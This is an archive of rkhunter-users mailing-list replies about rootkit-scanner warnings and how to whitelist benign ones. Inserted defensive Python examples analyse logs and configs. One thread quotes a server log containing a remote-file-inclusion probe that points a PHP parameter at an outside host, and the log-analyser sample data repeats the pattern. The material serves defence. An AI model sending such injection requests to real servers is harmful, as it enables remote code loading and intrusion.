

Re: [Rkhunter-users] Lots of warnings

2008-12-04 Thread Helmut Hullen
Hello, Mark,

You (munguanaweza) wrote on 04.12.08:

> quotes didn't come out as being very distinctive.  To fix this I set
> up a gmail account that allows me to send mail without regard to my
> location around the world.

Thank you!

> This is presented in the second attachment rkhunter warnings.

Please don't put pure text files into word processor documents. Please  
don't use attachments etc.
Thank you!

Kind regards!
Helmut


Re: [Rkhunter-users] I Need Some Help Please

2008-12-01 Thread Helmut Hullen
Hello, Al,

You (gy.al51) wrote on 01.12.08:

> I have Ubuntu Hardy Heron OS, and I think that I have accidentally
> had a keylogger and some other root kits installed on it.

Then delete the installation and make a new one.

Kind regards!
Helmut


Re: [Rkhunter-users] I Need Some Help Please

2008-12-01 Thread Helmut Hullen
Hello, Mark,

You (munguanaweza) wrote on 02.12.08:

> Hi,

-- quoting ---

> Actually, the system looks pretty clean to me. The four files
> /usr/bin/groups, /usr/bin/ldd, /sbin/chkconfig, and /sbin/ifup
> are very slightly concerning. As I mentioned, they may simply
> be scripts on your system, and informing rkhunter about your
> package manager may make those go away.

---


- your own text --

> The /dev file readout
>   /dev/shm/sysconfig/config-lo: ASCII text
> [23:28:37]  /dev/shm/sysconfig/config-eth1: ASCII text
> [23:28:37]  /dev/shm/sysconfig/config-eth0: ASCII text
> [23:28:37]  /dev/shm/sysconfig/new-stamp-3: ASCII text
> [23:28:37]  /dev/shm/sysconfig/new-stamp-2: ASCII text

> I don't know what these particular readouts mean.

Please use a better mail reader, which can work with quoting etc., which has the option "reply" etc.

Kind regards!
Helmut


Re: [Rkhunter-users] (no subject)

2008-10-09 Thread Helmut Hullen
Hello, Sportsman,

You (info) wrote on 08.10.08:

> First let me start off by saying I'm a complete newbie to the
> dedicated server field, ssh and security.  I have paid configserver
> to install a security package and root kit hunter was part of it.

Ok - your provider can read the configuration file. Maybe he doesn't allow you to read it too.
But that's a problem between your provider and you.

Kind regards!
Helmut


Re: [Rkhunter-users] Can't update rkhunter

2008-09-04 Thread Helmut Hullen
Hello, Kenton,

You (kbrede) wrote on 04.09.08:

>>> Yesterday I installed rkhunter 1.3.2.  When I run a "rkhunter
>>> --update" it just hangs.

I've just tried it (again): no problems. Same rkhunter version.

"/var/lib/rkhunter/db/mirrors.dat" has 58 bytes, only "root" can access it.

Contents (just updated, with the "update" command): only the mirror "rkhunter.sourceforge.net" (full http URL, just as you have shown) and the version.

Kind regards!
Helmut


Re: [Rkhunter-users] is this a intrusion?

2008-07-28 Thread Helmut Hullen
Hello, Mix,

You (michitux) wrote on 28.07.08:

> (intelcore2 2,3g and 2gb ram with ubuntu 8.04)


> [23:08:20] /bin/kill  [ Warning ]
> [23:08:20] Warning: The file properties have changed:
> [23:08:20]  File: /bin/kill
> [23:08:20]  Current hash: 5f85ce91eafbd85f79441f71ecad0f0db722c1bf
> [23:08:20]  Stored hash : 18e7cde8dfbeac32608ae47f857d2b168cfc72cb
> [23:08:20]  Current inode: 4915243    Stored inode: 5242882
> [23:08:20]  Current file modification time: 1215682114
> [23:08:20]  Stored file modification time : 1205447087

Has Ubuntu updated some files?

Viele Gruesse!
Helmut



Re: [Rkhunter-users] infected and trojans

2008-07-15 Thread Helmut Hullen
Hallo, Martin,

Du (martin) meintest am 15.07.08:

> This doesn't look good? Any ideas?



> Checking `bindshell'... INFECTED (PORTS:  465)

> Checking `lkm'... Enye LKM found

> chkproc: Warning: Possible LKM Trojan installed


http://lists.debian.org/debian-user-german/2004/05/msg02024.html
http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=160539
http://www.mail-archive.com/[EMAIL PROTECTED]/msg341361.html
http://guru.multimedia.cx/a-few-days-ago-chkrootkit-told-me-enye-lkm-found/

Viele Gruesse!
Helmut



Re: [Rkhunter-users] Scanning for hidden files

2008-07-15 Thread Helmut Hullen
Hallo, Martin,

Du (martin) meintest am 15.07.08:

> I get this mail every day. I don't understand what it means. What do I
> have to do?


> Scanning for hidden files...  [ Warning! ]

> -
> Found warnings:

> [06:25:46] WARNING, found:  /dev/.static (directory)  /dev/.udev
> (directory)  /dev/.initramfs (directory)
> -

Look in "/etc/rkhunter.conf" for "ALLOWHIDDENDIR".


Viele Gruesse!
Helmut



Re: [Rkhunter-users] warnings

2008-07-09 Thread Helmut Hullen
Hallo, Terry,

Du (fastsnip-family1) meintest am 06.07.08:

> I receive daily the following warnings from rkhunter, version 1.3.0
> ===
> Date: Sun, 06 Jul 2008 14:05:10 -0400

> Warning: Hidden directory found: /dev/.static
> Warning: Hidden directory found: /dev/.udev
> Warning: Hidden directory found: /dev/.initramfs


Look into "/etc/rkhunter.conf", search for "hidden directories"

Viele Gruesse!
Helmut



[Rkhunter-users] Installation (was: "Welcome" & "Please subscribe" in same message?)

2008-06-22 Thread Helmut Hullen
Hallo, Linda,

Du (linda) meintest am 21.06.08:

> Hi from a new member. I want to upgrade to the most recent version of
> Rootkit Hunter (1.3.2) but can't determine how to get it onto my
> server via PuTTY.

???
You have to "install" the downloaded package.

Viele Gruesse!
Helmut



Re: [Rkhunter-users] doubt about ident warning menssege..

2008-06-13 Thread Helmut Hullen
Hallo, unspawn,

Du (unspawn) meintest am 13.06.08:

> It means that the inetd superserver allows remote parties to send
> ident queries to your machine on port TCP/113. This service is only
> necessary if remote mail or IRC servers require it.

No - the "ident" service is helpful on a squid server too, and there may  
be some other services.

Viele Gruesse!
Helmut



Re: [Rkhunter-users] Might be compromised?

2008-05-17 Thread Helmut Hullen
Hallo, Eric,

Du (mailinglists) meintest am 16.05.08:


> Scanning for hidden files...   [
> Warning! ] ---
> /etc/.pwd.lock /dev/.static
> /dev/.udev
> /dev/.initramfs
> /dev/.initramfs-tools
> ---
> Please inspect:  /dev/.static (directory)  /dev/.udev (directory)
> /dev/.initramfs (directory)

> This is the only item that was strange.

Look (in "/etc/rkhunter.conf") for "ALLOWHIDDENDIR" and "ALLOWHIDDENFILE".

> I think I am going to do a clean install over the weekend,

That does not make these messages disappear - you have to allow them in "/etc/rkhunter.conf" (if these files or directories are ok).

Viele Gruesse!
Helmut



Re: [Rkhunter-users] Warnings rkhunter 1.3.2? Not in other versions...

2008-05-13 Thread Helmut Hullen
Hallo, Dave,

Du (rkhunter) meintest am 13.05.08:

>>> [11:41:26] Warning: Hidden file found:
>>> /usr/share/man/zh_CN/man1/..1.gz: gzip compressed data, from Unix,
>>> max compression

>> Strange. I'd delete this file.

> On our CentOS boxes I have to whitelist a similar file,
> /usr/share/man/man1/..1.gz. According to yum it belongs to the bash
> package,

Looking into the Slackware bash package (with "mc") I don't find a file like "*/man1/..1*".

Viele Gruesse!
Helmut



Re: [Rkhunter-users] Warnings rkhunter 1.3.2? Not in other versions...

2008-05-12 Thread Helmut Hullen
Hallo, Boyd,

Du (gerberb) meintest am 12.05.08:

> [11:41:26]   Checking for hidden files and directories [ Warning ]
> [11:41:26] Warning: Hidden file found:
> /usr/share/man/man5/.k5login.5.gz: gzip compressed data, from Unix,
> max compression

Maybe ok.

> [11:41:26] Warning: Hidden file found:
> /usr/share/man/zh_CN/man1/..1.gz: gzip compressed data, from Unix,
> max compression

Strange. I'd delete this file.

Viele Gruesse!
Helmut



Re: [Rkhunter-users] suspicious files opensuse 10.2

2008-05-12 Thread Helmut Hullen
Hallo, lists,

Du (mr.astral) meintest am 12.05.08:

> rkhunter gave me the following files as suspicious...

> http://pastebin.ca/1012886

> Are these files "normal"

Look (in "/etc/rkhunter.conf") for "ALLOWDEVFILE".

Viele Gruesse!
Helmut



Re: [Rkhunter-users] about usedzaRwT.KiT/zaRwT.KiT

2008-04-23 Thread Helmut Hullen
Hallo, unspawn,

Du (unspawn) meintest am 22.04.08:

>> By the way, how can I add some files to be checked?

> RKH is not a file integrity checker,

Sure?

Viele Gruesse!
Helmut



Re: [Rkhunter-users] ¿It's my Debian hacked?

2008-04-17 Thread Helmut Hullen
Hallo, Pedro,

Du (ercrokan) meintest am 18.04.08:

> [20:00:55] Warning: The file properties have changed:
> [20:00:55] File: /usr/sbin/tcpd

> [20:00:55] Current file modification time: 1207324330
> [20:00:55] Stored file modification time : 1185732044

It has changed. Have you changed it?

If not: that may be malware.

Viele Gruesse!
Helmut



Re: [Rkhunter-users] SSH warning

2008-03-27 Thread Helmut Hullen
Hallo, Mark,

Du (munguanaweza) meintest am 27.03.08:

> I receive this  warning after installation:

>  Checking if SSH root access is allowed   [ Warning ]

> I modify the /etc/ssh/sshd_config file to the following:

> PermitRootLogin no

What does

grep ^ALLOW_SSH_ROOT /etc/rkhunter.conf

tell you? It must contain the same option as in "/etc/ssh/sshd_config".

Viele Gruesse!
Helmut



Re: [Rkhunter-users] Fwd: [rkhunter] Daily run

2008-01-22 Thread Helmut Hullen
Hallo, Eggert,

Du (eggert.ehmke) meintest am 22.01.08:

> I get this message on each run of rkhunter. Is this a false positive?

> This is rkhunter 1.2.9, Debian Etch

Make an update to "rkhunter 1.3.0"

> Scanning for hidden files...  [ Warning! ]
> -

> Found warnings:
> [02:32:33] WARNING, found:  /dev/.static (directory)  /dev/.udev
> (directory)  /dev/.initramfs (directory)

Look for "ALLOWHIDDENDIR" in "/etc/rkhunter.conf"

Viele Gruesse!
Helmut



Re: [Rkhunter-users] missing hashes 3

2007-12-28 Thread Helmut Hullen
Hallo, Dogsbody,

Du (dan) meintest am 28.12.07:

>> There you should find an entry for "less" (among many other entries).
>> It should be a new file (produced by "rkhunter --propupd").

> Yes, as Larry says, this file seems to get updated except for the
> hashes for these three files, it's all very strange.

Just to make you nervous: can you put clean files into your computer  
(via a live CD)?
Perhaps for the md5sum job too.

> # which -a less
> /usr/bin/less
> # locate bin/less | grep less$
> /usr/bin/less

Ok - no second file.

Viele Gruesse!
Helmut



Re: [Rkhunter-users] missing hashes 3

2007-12-28 Thread Helmut Hullen
Hallo, Larry,

Du (rkhunter) meintest am 28.12.07:

>> /var/lib/rkhunter/db/rkhunter.dat
>> There you should find an entry for "less" (among many other entries).
>> It should be a new file (produced by "rkhunter --propupd").

> /usr/local/rkhunter/lib/rkhunter/db/rkhunter.dat is where I found
> mine, all of the ones RKHunter is whinging about are listed without
> hashes and show the correct path!

Strange.
Should be:
File:/usr/bin/less:::rights:owner:group:length:

Viele Gruesse!
Helmut



Re: [Rkhunter-users] missing hashes 3

2007-12-28 Thread Helmut Hullen
Hallo, Dogsbody,

Du (dan) meintest am 25.12.07:

> After upgrading my operating system (CentOS 4.5 to 4.6) I am getting
> some errors   I don't quite understand.  After upgrading I did a
> --propupd.

> # rkhunter --propupd
> [ Rootkit Hunter version 1.3.0 ]
> File updated: searched for 147 files, found 124, missing hashes 3

> # rkhunter --cronjob --report-warnings-only
> Warning: No hash value found for file '/usr/bin/less' in the
> rkhunter.dat file.

/var/lib/rkhunter/db/rkhunter.dat

There you should find an entry for "less" (among many other entries). It should be a new file (produced by "rkhunter --propupd").

What does

which -a less

locate bin/less | grep less$

tell you?

Viele Gruesse!
Helmut



Re: [Rkhunter-users] False warnings on FreeBSD

2007-12-15 Thread Helmut Hullen
Hallo, AnMaster,

Du (anmaster) meintest am 15.12.07:


> Also I get warnings like this:
> [13:57:24] /usr/bin/whatis   [
> Warning ] [13:57:24] Warning: The command '/usr/bin/whatis' has been
> replaced by a script: /usr/bin/whatis: Bourne shell script text
> executable [13:57:27] /usr/sbin/adduser

Look into "/etc/rkhunter.conf", search for "SCRIPTWHITELIST"

> Another one:
> [13:59:12] Info: Found password file: /etc/passwd
> [13:59:12]   Checking for root equivalent (UID 0) accounts   [
> Warning ] [13:59:12] Warning: Account 'toor' is root equivalent (UID
> = 0)

Look into "/etc/rkhunter.conf", search for "UID0_ACCOUNTS"

> I hope these issues get fixed

They are fixed ...

Viele Gruesse!
Helmut



Re: [Rkhunter-users] Possible rootkit?

2007-12-03 Thread Helmut Hullen
Hallo, Johan,

Du (johan.sundstrom) meintest am 03.12.07:

> IP Address of attacker: xxx.yyy.zzz.zzz

> Type of attack: URL Injection -- attempt to inject / load files onto
> the server via PHP/CGI vulnerabilities

> Sample log report including date and time stamp:

>   Request: onlinesurfnshop.com xxx.yyy.zzz.zzz - -
> [01/Dec/2007:16:59:21 -0800] "GET

> /logos/banners//index.php?skin_file=http://www.n0n-clan.net//vwar/con
> vert/test.txt? HTTP/1.1" 500 549 "-" "libwww-perl/5.805" - "-"

I stop these nasty scripts with an entry in the ".htaccess" file in the  
apache "DocumentRoot":

BrowserMatchNoCase "^libwww-perl" botnet

order allow,deny
allow from all
deny from env=botnet

You can choose another name than "botnet", you can add other definitions  
for this self defined environment variable(s). The "order/allow/deny"  
block first allows "all" and then blocks all defined requests.

Without this entry the tries result in error level 404 (or 500) in  
"error_log". With this entry they produce error level 403.

I have tried this entry on a website with about 2000 visits a day; over  
a month there was no "good" try with the Browser "libwww-perl". Only  
nasty scripts.

Viele Gruesse!
Helmut
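To show what the probes described above look like from the defender's side, here is an added detection example (my own Python, not code from the post, from Apache or from rkhunter): it parses combined-format access-log lines, flags the "libwww-perl" client that the BrowserMatchNoCase rule keys on and any query parameter whose value is a remote URL, and counts hits per client and status so the 403 produced by the deny rule is visible next to the 500/404 seen without it. All log lines, hostnames and addresses in it are constructed.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qsl

# Apache "combined" log format with an optional leading vhost field, as in
# the quoted report. The vhost must start with a letter so that a line that
# begins directly with a numeric client IP is parsed correctly. No end anchor,
# so extra trailing fields are tolerated.
LOG_RE = re.compile(
    r'^(?:(?P<vhost>[A-Za-z][\w.-]*)\s+)?(?P<ip>\S+) \S+ \S+ '
    r'\[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)
# A query-parameter value that is itself a URL: the remote-file-inclusion
# pattern (skin_file=http://...) seen in the report.
REMOTE_URL = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)


def parse_line(line):
    """Parse one access-log line into a dict, or return None if it does not
    match the expected format (such lines are skipped, not guessed at)."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def remote_url_params(target):
    """Names of query parameters in the request target whose value is a
    remote URL."""
    query = urlsplit(target).query
    return [name for name, value in parse_qsl(query, keep_blank_values=True)
            if REMOTE_URL.match(value)]


def analyse(lines):
    """Return one finding per log line that trips a rule: the User-Agent
    rule the .htaccess entry above keys on, and the remote-URL rule."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        rules = []
        if rec['ua'].lower().startswith('libwww-perl'):
            rules.append('libwww-perl-client')
        params = remote_url_params(rec['target'])
        if params:
            rules.append('remote-url-in-query:' + ','.join(params))
        if rules:
            findings.append({'ip': rec['ip'], 'status': int(rec['status']),
                             'target': rec['target'], 'rules': rules})
    return findings


def per_client(findings):
    """Flagged requests counted per (client IP, HTTP status): with the deny
    rule in place the same probes show up as 403 instead of 404/500."""
    return dict(Counter((f['ip'], f['status']) for f in findings))


# Constructed sample lines (hostnames and addresses are documentation values).
SAMPLE_LOG = [
    # the probe from the report, answered with 500 before the deny rule existed
    'www.example.test 198.51.100.7 - - [01/Dec/2007:16:59:21 -0800] '
    '"GET /logos/banners//index.php?skin_file=http://remote.invalid//vwar/convert/test.txt? '
    'HTTP/1.1" 500 549 "-" "libwww-perl/5.805" - "-"',
    # the same client after "deny from env=botnet": refused with 403
    'www.example.test 198.51.100.7 - - [01/Dec/2007:17:02:03 -0800] '
    '"GET /index.php?skin_file=http://remote.invalid/x.txt? HTTP/1.1" '
    '403 212 "-" "libwww-perl/5.805" - "-"',
    # ordinary browser traffic: parsed, but no rule matches
    'www.example.test 203.0.113.9 - - [01/Dec/2007:17:05:44 -0800] '
    '"GET /index.php?page=news HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (X11; Linux)"',
    # a line that is not in combined format is skipped
    'garbage line that does not parse',
]

if __name__ == '__main__':
    for finding in analyse(SAMPLE_LOG):
        print(finding)
    print(per_client(analyse(SAMPLE_LOG)))
```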



Re: [Rkhunter-users] found enabled xinetd service

2007-11-16 Thread Helmut Hullen
Hallo, John,

Du (john.horne) meintest am 16.11.07:

>> "rkhunter" works well (at least I hope so ...). But it always tells
>> "Warning: Found enabled xinetd service: /etc/xinetd.conf"

> To whitelist the above message add
> 'XINETD_ALLOWED_SVC=/etc/xinetd.conf' to your rkhunter.conf file.

Ok - it works.

XINETD_CONF_PATH=/etc/xinetd.conf
XINETD_ALLOWED_SVC=/etc/xinetd.conf

and the allowed services inside /etc/xinetd.d (regardless of whether they are enabled or disabled).

No more warnings - thank you!

Viele Gruesse!
Helmut



[Rkhunter-users] SSH message doesn't fit

2007-11-16 Thread Helmut Hullen
Hallo, rkhunter-users,

in de.comp.os.unix.linux.misc a colleague reported

>>> Warning: The SSH and rkhunter configuration options should be the
>>> same:   SSH configuration option 'PermitRootLogin': yes
>>>   Rkhunter configuration option 'ALLOW_SSH_ROOT_USER': no

> :~# grep -i PermitRootLogin /etc/ssh/sshd_config
> PermitRootLogin yes
> :~# grep -i ALLOW_SSH_ROOT_USER /etc/rkhunter.conf
> ALLOW_SSH_ROOT_USER=yes

Why does "rkhunter" mourn about different configuration options?

Viele Gruesse!
Helmut



[Rkhunter-users] found enabled xinetd service

2007-11-15 Thread Helmut Hullen
Hallo, rkhunter-users,

"rkhunter" works well (at least I hope so ...). But it always tells  
"Warning: Found enabled xinetd service: /etc/xinetd.conf"

I use inetd, but (for other reasons) "/etc/xinetd.conf" exists, and "/etc/xinetd.d" exists with 2 entries.

How can I tell "rkhunter" not to mourn?
I have tried "#" for commenting in and out (?) the lines in "/etc/rkhunter.conf" - doesn't help (or I haven't found the only right way).

Viele Gruesse!
Helmut



Re: [Rkhunter-users] Many new warnings on FreeBSD

2007-10-23 Thread Helmut Hullen
Hallo, John,

Du (john.horne) meintest am 23.10.07:

>> But when RKH can find the actual value of "PermitRootLogin": why
>> does it need an entry in "/etc/rkhunter.conf"?

> To see if the value has been changed. If a hacker changes your
> "PermitRootLogin" to 'yes' in sshd_config, then you will probably
> want to know about it.

Ok - sounds reasonable.

Viele Gruesse!
Helmut



Re: [Rkhunter-users] Many new warnings on FreeBSD

2007-10-23 Thread Helmut Hullen
Hallo, John,

Du (john.horne) meintest am 23.10.07:

>> since upgrading RKHunter to the current version 1.3.0 i got multiple
>> new warning messages on my FreeBSD box.


>> Warning: No local startup files found.
>>
>> -> Why is this resulting in a warning if no local startup file was
>> -> found?
>>
> In this case the check is for the file used for local startup
> modifications. Typically something like /etc/rc.d/rc.local or
> rc.sysinit. Again, having no such file is suspicious.

Can you do some tricks with "OS_VERSION_FILE"?

  http://arktur.de/Wiki/Entwicklung:UIDGID#Kennungen
  http://arktur.shuttle.de/beta/Paketbau.shtml#init

I have no information about the BSD names and locations, but perhaps I (or someone else) could find them in packages which fit many distributions, p.e. LTSP or apcupsd.

By the way: I have built a Slackware tarball:

http://arktur.shuttle.de/CD/5.0-slack/slack/n1/rkhunter-1.3.0-noarch-1hln.tgz

> The value of 'PermitRootLogin' in the sshd_config must be exactly the
> same as that in the rkhunter.conf file (the ALLOW_SSH_ROOT_USER
> option). Since SSH defaults to 'yes', and RKH defaults to 'no', you
> get a warning. You need to set the option in the sshd_config file to
> some value suitable for your requirements, and then set
> ALLOW_SSH_ROOT_USER to the same value in the rkhunter.conf file. (I
> guess we should allow some setting for when the 'PermitRootLogin' is
> unset.)

But when RKH can find the actual value of "PermitRootLogin": why does it  
need an entry in "/etc/rkhunter.conf"?

Viele Gruesse!
Helmut
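The rule John describes (PermitRootLogin in sshd_config must equal ALLOW_SSH_ROOT_USER in rkhunter.conf, with sshd defaulting to 'yes' and rkhunter to 'no' when the option is absent), and the case from the "SSH message doesn't fit" post above, as an added example in Python that is my own code, not rkhunter's implementation. It reads both files' text, applies the defaults when a directive is missing or commented out, and reports a mismatch in the wording of the warning; the config snippets are constructed, and the sshd default is a parameter because a vendor build may ship a different one.

```python
import re

# Defaults as stated in the thread: sshd permits root login when the
# directive is absent, rkhunter assumes 'no' when its option is unset.
SSHD_DEFAULT = 'yes'
RKH_DEFAULT = 'no'

# "Keyword value" or "Keyword=value"; keywords are case-insensitive in sshd.
SSHD_DIRECTIVE = re.compile(r'^(\w+)\s*(?:=|\s)\s*(\S+)')


def sshd_permit_root_login(config_text, default=SSHD_DEFAULT):
    """Effective PermitRootLogin from sshd_config text. sshd takes the first
    occurrence of a keyword; '#' lines are comments, so a commented-out
    '#PermitRootLogin no' leaves the compiled-in default in force. Directives
    inside a Match block are conditional and are not considered here."""
    for line in config_text.splitlines():
        line = line.strip()
        if not line or line.startswith('#'):
            continue
        m = SSHD_DIRECTIVE.match(line)
        if not m:
            continue
        keyword, value = m.group(1).lower(), m.group(2).lower()
        if keyword == 'match':
            break
        if keyword == 'permitrootlogin':
            return value
    return default.lower()


def rkhunter_allow_ssh_root_user(config_text, default=RKH_DEFAULT):
    """ALLOW_SSH_ROOT_USER from rkhunter.conf text (KEY=value lines, '#'
    comments); the last assignment wins, as in a shell-style config."""
    value = default
    for line in config_text.splitlines():
        m = re.match(r'^ALLOW_SSH_ROOT_USER\s*=\s*(\S+)', line.strip())
        if m:
            value = m.group(1).strip('"\'')
    return value.lower()


def check_ssh_root(sshd_text, rkh_text, sshd_default=SSHD_DEFAULT):
    """Apply the rule from the thread: the two values must be identical.
    Returns (ok, message); the message mirrors the warning quoted above."""
    ssh_val = sshd_permit_root_login(sshd_text, sshd_default)
    rkh_val = rkhunter_allow_ssh_root_user(rkh_text)
    if ssh_val == rkh_val:
        return True, f"PermitRootLogin '{ssh_val}' matches ALLOW_SSH_ROOT_USER"
    return False, ("The SSH and rkhunter configuration options should be the same: "
                   f"SSH configuration option 'PermitRootLogin': {ssh_val} "
                   f"Rkhunter configuration option 'ALLOW_SSH_ROOT_USER': {rkh_val}")


# Constructed config snippets.
SSHD_COMMENTED_OUT = ("#PermitRootLogin no\n#Protocol 2\n"
                      "Subsystem sftp /usr/libexec/sftp-server\n")
SSHD_HARDENED = ("Protocol 2\nPermitRootLogin no\n"
                 "Match Address 192.0.2.0/24\n    PermitRootLogin yes\n")
RKH_UNSET = "# ALLOW_SSH_ROOT_USER=yes\n"
RKH_NO = "ALLOW_SSH_ROOT_USER=no\n"

if __name__ == '__main__':
    for sshd, rkh in ((SSHD_COMMENTED_OUT, RKH_UNSET), (SSHD_HARDENED, RKH_NO)):
        print(check_ssh_root(sshd, rkh))
```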



Re: [Rkhunter-users] Many new warnings on FreeBSD

2007-10-23 Thread Helmut Hullen
Hallo, Avalon,

Du (third-chance) meintest am 23.10.07:

> thank you, Helmut, for your fast reply. I must have been blind when i
> was looking over the default config. I found the settings you
> described and they worked well.

Don't mention it - I had searched for these errors some hours ago ...

> This seems to be different under FreeBSD too. Both settings
> "PermitRootLogin no" and "Protocol 2" are commented out in my
> sshd_config, which is the default on FreeBSD. Root-Login is
> definitely not permitted under FreeBSD out-of-the-box - until now i
> was quite sure about that ;-)

In Linux-SSHD "PermitRootLogin=yes" is the default value.

Viele Gruesse!
Helmut



Re: [Rkhunter-users] Many new warnings on FreeBSD

2007-10-23 Thread Helmut Hullen
Hallo, John,

Du (john.horne) meintest am 23.10.07:

>> This seems to be different under FreeBSD too. Both settings
>> "PermitRootLogin no" and "Protocol 2" are commented out in my
>> sshd_config, which is the default on FreeBSD. Root-Login is
>> definitely not permitted under FreeBSD out-of-the-box - until now i
>> was quite sure about that ;-)
>>
> Either the comments in the sshd_config file or the man page for
> sshd_config should be able to provide you with a definite answer as
> to what the defaults are.

From where does RKH get the information: from the config file or from the running daemon?

Viele Gruesse!
Helmut



Re: [Rkhunter-users] Many new warnings on FreeBSD

2007-10-23 Thread Helmut Hullen
Hallo, Avalon,

Du (third-chance) meintest am 23.10.07:

> Can anyone give me a hint how to suppress the following messages:

> /usr/bin/whatis   [ Warning ]
> Warning: The command '/usr/bin/whatis' has been replaced by a script:
> /usr/bin/whatis: Bourne shell script text executable

Take "/etc/rkhunter.conf", search for "SCRIPTWHITELIST"

> Info: Starting test name 'possible_rkt_strings'
> Warning: Checking for possible rootkit strings  [ Warning ]
> No system startup files found.

> -> Why is this resulting in a warning if no startup file was found?

Take "/etc/rkhunter.conf", search for "startup"

Viele Gruesse!
Helmut



Re: [Rkhunter-users] rkunter

2007-10-22 Thread Helmut Hullen
Hallo, Börje,

Du (kaboki) meintest am 22.10.07:

> Got this while scanning with rkhunter, and was wondering what it
> means?

> [06:25:39] WARNING, found:  /dev/.static (directory)  /dev/.udev
> (directory)  /dev/.initramfs (directory)

That's simple: look into "/etc/rkhunter.conf", search for "/dev/.udev".

Viele Gruesse!
Helmut
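The ALLOWHIDDENDIR / ALLOWHIDDENFILE whitelisting that the hidden-files threads on this page keep coming back to (and why a clean reinstall alone does not silence the warnings), as an added example in Python that is my own simplified model, not rkhunter's implementation: hidden entries directly inside the scanned directories are reported unless the config names them under the key for their kind, with exact path matching. The directory tree with /dev/.static, /dev/.udev, /dev/.initramfs and /etc/.pwd.lock is constructed under a temporary root.

```python
import os
import tempfile


def parse_allowlist(conf_text):
    """Collect ALLOWHIDDENDIR and ALLOWHIDDENFILE entries from rkhunter.conf-
    style text; each key may appear any number of times, '#' lines are
    comments. Returns (allowed_dirs, allowed_files) as sets of exact paths."""
    allowed_dirs, allowed_files = set(), set()
    for line in conf_text.splitlines():
        line = line.strip()
        if not line or line.startswith('#'):
            continue
        key, sep, value = line.partition('=')
        if not sep:
            continue
        key, value = key.strip(), value.strip().strip('"\'')
        if key == 'ALLOWHIDDENDIR':
            allowed_dirs.add(value)
        elif key == 'ALLOWHIDDENFILE':
            allowed_files.add(value)
    return allowed_dirs, allowed_files


def find_hidden(scan_dirs):
    """Yield (path, kind) for dot-entries directly inside each scanned
    directory; kind is 'directory' or 'file' (a symlink counts as a file)."""
    for directory in scan_dirs:
        try:
            names = os.listdir(directory)
        except OSError:
            continue  # not present on this system: nothing to report
        for name in sorted(names):
            if name.startswith('.'):
                path = os.path.join(directory, name)
                is_dir = os.path.isdir(path) and not os.path.islink(path)
                yield path, 'directory' if is_dir else 'file'


def hidden_warnings(scan_dirs, conf_text):
    """Hidden entries that are not whitelisted, in the "path (kind)" form the
    warnings above use. A directory is only excused by ALLOWHIDDENDIR and a
    file only by ALLOWHIDDENFILE; the path must match exactly."""
    allowed_dirs, allowed_files = parse_allowlist(conf_text)
    warnings = []
    for path, kind in find_hidden(scan_dirs):
        allowed = allowed_dirs if kind == 'directory' else allowed_files
        if path not in allowed:
            warnings.append(f"{path} ({kind})")
    return warnings


def demo():
    """Recreate the layout from the threads (constructed, under a temporary
    root) and run the check three times: with no allowlist, with the entries
    whitelisted under the right keys, and with a directory listed under the
    file key. Returns the three warning lists."""
    root = tempfile.mkdtemp(prefix='rkh-hidden-')
    dev, etc = os.path.join(root, 'dev'), os.path.join(root, 'etc')
    hidden_dirs = ('.static', '.udev', '.initramfs')
    for name in hidden_dirs:
        os.makedirs(os.path.join(dev, name))
    os.makedirs(etc)
    open(os.path.join(etc, '.pwd.lock'), 'w').close()
    conf = ''.join(f"ALLOWHIDDENDIR={dev}/{n}\n" for n in hidden_dirs)
    conf += f"ALLOWHIDDENFILE={etc}/.pwd.lock\n"
    wrong_kind = f"ALLOWHIDDENFILE={dev}/.udev\n"   # wrong key: does not excuse it
    return (hidden_warnings([dev, etc], ''),
            hidden_warnings([dev, etc], conf),
            hidden_warnings([dev, etc], wrong_kind))


if __name__ == '__main__':
    for label, result in zip(('no allowlist', 'allowlisted', 'wrong key'), demo()):
        print(label, result)
```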
